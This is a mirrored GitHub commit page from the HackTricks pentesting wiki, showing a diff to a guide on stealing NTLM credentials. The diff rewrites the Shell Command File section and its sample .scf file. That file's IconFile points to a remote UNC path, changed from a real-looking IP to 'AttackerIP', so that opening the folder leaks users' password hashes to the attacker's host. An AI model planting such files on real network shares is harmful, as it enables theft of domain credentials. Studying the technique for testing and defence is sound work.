Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 09:27:32 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #252 from A1vinSmith/master

Browse source 
Update places-to-steal-ntlm-creds.md
This commit is contained in:
Carlos Polop 2021-10-07 13:28:51 +01:00 committed by GitHub
commit 79f06012ed
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
windows/ntlm/places-to-steal-ntlm-creds.md
View file

@ -188,12 +188,12 @@ action=open Setup.exe
## Shell Command Files
You can save this as `something.scf` and once you open the folder explorer will try to resolve the network path for the icon.
It is possible to obtain passwords hashes of domain users or shells when writing permissions given to unauthenticated users. SCF (Shell Command Files) can perform a limited set of operations like showing the Windows desktop or opening a Windows Explorer. Save the code below as `ordinary.scf` and put it into a network share.
```text
[Shell]
Command=2
IconFile=\\35.164.153.224\test.ico
IconFile=\\AttackerIP\ordinary.ico
[Taskbar]
Command=ToggleDesktop
```